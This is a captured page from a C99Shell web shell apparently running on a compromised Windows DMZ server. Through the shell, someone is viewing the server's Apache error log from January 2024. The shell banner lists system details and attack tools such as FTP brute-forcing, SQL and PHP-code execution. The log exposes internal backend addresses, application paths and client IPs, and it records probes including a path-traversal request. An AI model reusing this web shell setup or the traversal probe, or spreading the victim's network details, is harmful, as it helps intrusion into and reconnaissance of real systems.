!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2024.01.20.log (37.84 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Sat Jan 20 00:05:11.597962 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 00:14:39.563759 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 00:18:09.945729 2024] [proxy:error] [pid 12004:tid 20768] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 00:18:09.945729 2024] [proxy:error] [pid 12004:tid 20768] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 00:18:09.945729 2024] [proxy_http:error] [pid 12004:tid 20768] [client 40.77.167.71:60506] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 00:26:09.989772 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 00:57:30.885076 2024] [proxy:error] [pid 12004:tid 21168] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 00:57:30.885076 2024] [proxy:error] [pid 12004:tid 21168] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 00:57:30.885076 2024] [proxy_http:error] [pid 12004:tid 21168] [client 51.222.253.19:26466] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 00:57:37.327887 2024] [proxy:error] [pid 12004:tid 21168] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 00:58:03.957134 2024] [proxy:error] [pid 12004:tid 21168] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 00:58:18.527559 2024] [proxy:error] [pid 12004:tid 21168] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 00:58:48.978813 2024] [proxy:error] [pid 12004:tid 20804] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 00:58:48.978813 2024] [proxy:error] [pid 12004:tid 20804] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 00:58:48.978813 2024] [proxy_http:error] [pid 12004:tid 20804] [client 51.222.253.9:41438] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 00:59:06.138843 2024] [proxy:error] [pid 12004:tid 20948] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 00:59:12.612854 2024] [proxy:error] [pid 12004:tid 21168] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 00:59:56.495731 2024] [proxy:error] [pid 12004:tid 20804] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 00:59:56.495731 2024] [proxy:error] [pid 12004:tid 20804] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 00:59:56.495731 2024] [proxy_http:error] [pid 12004:tid 20804] [client 51.222.253.13:43522] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 01:00:23.405779 2024] [proxy:error] [pid 12004:tid 20948] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:00:47.960222 2024] [proxy:error] [pid 12004:tid 20948] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:01:02.889448 2024] [proxy:error] [pid 12004:tid 21044] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 01:01:02.889448 2024] [proxy:error] [pid 12004:tid 21044] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 01:01:02.889448 2024] [proxy_http:error] [pid 12004:tid 21044] [client 51.222.253.11:29386] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 01:01:24.854287 2024] [proxy:error] [pid 12004:tid 21044] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:01:52.825136 2024] [proxy:error] [pid 12004:tid 21044] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:02:07.317561 2024] [proxy:error] [pid 12004:tid 20804] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 01:02:07.317561 2024] [proxy:error] [pid 12004:tid 20804] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 01:02:07.317561 2024] [proxy_http:error] [pid 12004:tid 20804] [client 51.222.253.7:43040] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 01:02:34.960810 2024] [proxy:error] [pid 12004:tid 20804] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:02:54.055243 2024] [proxy:error] [pid 12004:tid 21044] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:03:21.448891 2024] [proxy:error] [pid 12004:tid 20804] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 01:03:21.448891 2024] [proxy:error] [pid 12004:tid 20804] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 01:03:21.448891 2024] [proxy_http:error] [pid 12004:tid 20804] [client 51.222.253.4:26904] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 01:03:35.644916 2024] [proxy:error] [pid 12004:tid 20948] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:03:39.123722 2024] [proxy:error] [pid 12004:tid 20948] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:04:24.878603 2024] [proxy:error] [pid 12004:tid 20948] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 01:04:24.878603 2024] [proxy:error] [pid 12004:tid 20948] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 01:04:24.878603 2024] [proxy_http:error] [pid 12004:tid 20948] [client 51.222.253.14:57418] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 01:04:48.887045 2024] [proxy:error] [pid 12004:tid 21044] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:05:13.488288 2024] [proxy:error] [pid 12004:tid 21044] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:05:33.783924 2024] [proxy:error] [pid 12004:tid 21044] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 01:05:33.783924 2024] [proxy:error] [pid 12004:tid 21044] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 01:05:33.783924 2024] [proxy_http:error] [pid 12004:tid 21044] [client 51.222.253.11:33850] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 01:05:41.771138 2024] [proxy:error] [pid 12004:tid 21044] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:06:00.849971 2024] [proxy:error] [pid 12004:tid 20948] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:06:21.130007 2024] [proxy:error] [pid 12004:tid 20804] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 01:06:39.584839 2024] [proxy:error] [pid 12004:tid 20948] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 01:06:39.584839 2024] [proxy:error] [pid 12004:tid 20948] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 01:06:39.584839 2024] [proxy_http:error] [pid 12004:tid 20948] [client 51.222.253.11:34984] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 01:22:06.132867 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 01:35:11.329046 2024] [proxy_http:error] [pid 12004:tid 21168] (20014)Internal error: [client 201.245.192.253:56864] AH01102: error reading status line from remote server 172.22.1.16:18080
[Sat Jan 20 01:35:11.329046 2024] [proxy:error] [pid 12004:tid 21168] [client 201.245.192.253:56864] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Sat Jan 20 01:35:12.358648 2024] [proxy:error] [pid 12004:tid 21360] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.16:18080 (172.22.1.16) failed
[Sat Jan 20 01:35:12.358648 2024] [proxy:error] [pid 12004:tid 21360] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.16) for 60s
[Sat Jan 20 01:35:12.358648 2024] [proxy_http:error] [pid 12004:tid 21360] [client 201.245.192.253:56866] AH01114: HTTP: failed to make connection to backend: 172.22.1.16
[Sat Jan 20 01:35:26.024272 2024] [proxy:error] [pid 12004:tid 21168] AH00940: HTTP: disabled connection for (172.22.1.16)
[Sat Jan 20 01:42:31.951820 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 02:03:00.765978 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 02:08:26.931351 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 02:09:04.605417 2024] [negotiation:error] [pid 12004:tid 21360] [client 172.22.2.4:48226] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Sat Jan 20 02:09:30.595063 2024] [negotiation:error] [pid 12004:tid 21500] [client 172.22.2.4:48234] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Sat Jan 20 02:10:51.481205 2024] [proxy:error] [pid 12004:tid 21372] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Sat Jan 20 02:10:51.481205 2024] [proxy:error] [pid 12004:tid 21372] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Sat Jan 20 02:10:51.481205 2024] [proxy_http:error] [pid 12004:tid 21372] [client 152.61.128.50:49099] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Sat Jan 20 02:10:51.730805 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (172.22.1.51)
[Sat Jan 20 02:10:51.980406 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (172.22.1.51)
[Sat Jan 20 02:35:26.463796 2024] [proxy:error] [pid 12004:tid 20804] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 02:35:26.463796 2024] [proxy:error] [pid 12004:tid 20804] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 02:35:26.463796 2024] [proxy_http:error] [pid 12004:tid 20804] [client 52.167.144.20:14160] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 02:47:54.329109 2024] [proxy:error] [pid 12004:tid 20768] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 02:47:54.329109 2024] [proxy:error] [pid 12004:tid 20768] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 02:47:54.329109 2024] [proxy_http:error] [pid 12004:tid 20768] [client 20.120.134.46:58816] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 03:35:07.496885 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 03:49:50.598836 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 03:56:11.629506 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 04:03:46.807105 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 05:19:29.176283 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 05:42:46.080737 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 06:03:56.344168 2024] [proxy:error] [pid 12004:tid 21372] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 06:03:56.344168 2024] [proxy:error] [pid 12004:tid 21372] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 06:03:56.344168 2024] [proxy_http:error] [pid 12004:tid 21372] [client 69.63.189.118:34820] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 06:08:08.284610 2024] [proxy:error] [pid 12004:tid 21168] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 06:08:08.284610 2024] [proxy:error] [pid 12004:tid 21168] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 06:08:08.284610 2024] [proxy_http:error] [pid 12004:tid 21168] [client 52.167.144.25:58592] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 06:30:35.066176 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 06:33:19.740065 2024] [proxy:error] [pid 12004:tid 20768] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 06:33:19.740065 2024] [proxy:error] [pid 12004:tid 20768] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 06:33:19.740065 2024] [proxy_http:error] [pid 12004:tid 20768] [client 40.77.167.3:3976] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 06:50:09.436239 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 07:08:05.619729 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 07:18:13.193996 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 07:56:46.506459 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 08:43:41.718604 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 08:51:38.892242 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 08:59:14.101041 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 09:14:18.450230 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 09:34:53.145598 2024] [proxy:error] [pid 12004:tid 21500] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 09:34:53.145598 2024] [proxy:error] [pid 12004:tid 21500] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 09:34:53.145598 2024] [proxy_http:error] [pid 12004:tid 21500] [client 66.249.66.167:36284] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 09:42:26.591595 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 09:48:03.957787 2024] [proxy:error] [pid 12004:tid 21516] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 09:48:03.957787 2024] [proxy:error] [pid 12004:tid 21516] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 09:48:03.957787 2024] [proxy_http:error] [pid 12004:tid 21516] [client 52.167.144.216:61661] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 09:55:13.473342 2024] [proxy:error] [pid 12004:tid 21372] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 09:55:13.473342 2024] [proxy:error] [pid 12004:tid 21372] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 09:55:13.473342 2024] [proxy_http:error] [pid 12004:tid 21372] [client 52.167.144.24:4512] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 09:55:13.707342 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:13.941343 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:14.268943 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:14.549744 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:14.799344 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:15.033345 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:15.220545 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:19.557353 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:26.234164 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:26.390165 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:26.624165 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:26.780165 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:26.982966 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:27.154566 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:27.294966 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:27.560167 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:27.731767 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:28.012567 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:28.355768 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:28.886169 2024] [proxy:error] [pid 12004:tid 21372] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:37.466184 2024] [proxy:error] [pid 12004:tid 21004] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:37.653384 2024] [proxy:error] [pid 12004:tid 21004] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:37.871785 2024] [proxy:error] [pid 12004:tid 21004] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:38.043385 2024] [proxy:error] [pid 12004:tid 21004] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:38.355386 2024] [proxy:error] [pid 12004:tid 21004] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:38.620586 2024] [proxy:error] [pid 12004:tid 21004] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:38.854586 2024] [proxy:error] [pid 12004:tid 21004] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 09:55:39.072987 2024] [proxy:error] [pid 12004:tid 21004] AH00940: HTTP: disabled connection for (192.168.175.18)
[Sat Jan 20 10:18:45.447422 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 10:42:22.850311 2024] [proxy:error] [pid 12004:tid 20968] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 10:42:22.850311 2024] [proxy:error] [pid 12004:tid 20968] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 10:42:22.850311 2024] [proxy_http:error] [pid 12004:tid 20968] [client 66.249.66.165:37497] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 10:54:59.576441 2024] [core:error] [pid 12004:tid 20892] [client 193.118.53.109:38254] AH00126: Invalid URI in request HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
[Sat Jan 20 11:13:13.528362 2024] [proxy_http:error] [pid 12004:tid 20968] (70008)Partial results are valid but processing is incomplete: [client 191.156.52.73:44904] AH02609: read request body failed to 172.22.1.61:8080 (172.22.1.61) from 191.156.52.73 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Sat Jan 20 11:13:13.528362 2024] [proxy_http:error] [pid 12004:tid 20968] [client 191.156.52.73:44904] AH01097: pass request body failed to 172.22.1.61:8080 (172.22.1.61) from 191.156.52.73 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Sat Jan 20 11:27:22.715853 2024] [proxy:error] [pid 12004:tid 21516] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 11:27:22.715853 2024] [proxy:error] [pid 12004:tid 21516] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 11:27:22.715853 2024] [proxy_http:error] [pid 12004:tid 21516] [client 66.249.66.165:41375] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 11:39:36.681543 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 11:44:18.808038 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 11:57:06.968987 2024] [proxy_http:error] [pid 12004:tid 20948] (70008)Partial results are valid but processing is incomplete: [client 191.156.54.206:41481] AH02609: read request body failed to 172.22.1.61:8080 (172.22.1.61) from 191.156.54.206 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Sat Jan 20 11:57:06.968987 2024] [proxy_http:error] [pid 12004:tid 20948] [client 191.156.54.206:41481] AH01097: pass request body failed to 172.22.1.61:8080 (172.22.1.61) from 191.156.54.206 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Sat Jan 20 11:57:15.018601 2024] [proxy_http:error] [pid 12004:tid 20892] (70008)Partial results are valid but processing is incomplete: [client 191.156.52.189:37224] AH02609: read request body failed to 172.22.1.61:8080 (172.22.1.61) from 191.156.52.189 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Sat Jan 20 11:57:15.018601 2024] [proxy_http:error] [pid 12004:tid 20892] [client 191.156.52.189:37224] AH01097: pass request body failed to 172.22.1.61:8080 (172.22.1.61) from 191.156.52.189 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Sat Jan 20 12:17:47.857567 2024] [proxy_http:error] [pid 12004:tid 21472] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 190.69.53.161:65070] AH01095: prefetch request body failed to 172.22.1.61:8080 (172.22.1.61) from 190.69.53.161 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Sat Jan 20 13:00:12.081636 2024] [cgi:error] [pid 12004:tid 21204] [client 185.224.128.191:51568] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Sat Jan 20 13:00:12.097236 2024] [cgi:error] [pid 12004:tid 21204] [client 185.224.128.191:51568] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Sat Jan 20 13:29:32.295127 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 13:48:22.376712 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 13:51:54.521485 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 14:04:52.338851 2024] [proxy:error] [pid 12004:tid 21080] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 14:04:52.338851 2024] [proxy:error] [pid 12004:tid 21080] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 14:04:52.338851 2024] [proxy_http:error] [pid 12004:tid 21080] [client 66.249.66.167:40148] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 14:23:55.836459 2024] [proxy_http:error] [pid 12004:tid 21372] (70008)Partial results are valid but processing is incomplete: [client 186.155.67.105:61366] AH02609: read request body failed to 172.22.1.61:8080 (172.22.1.61) from 186.155.67.105 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Sat Jan 20 14:23:55.836459 2024] [proxy_http:error] [pid 12004:tid 21372] [client 186.155.67.105:61366] AH01097: pass request body failed to 172.22.1.61:8080 (172.22.1.61) from 186.155.67.105 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
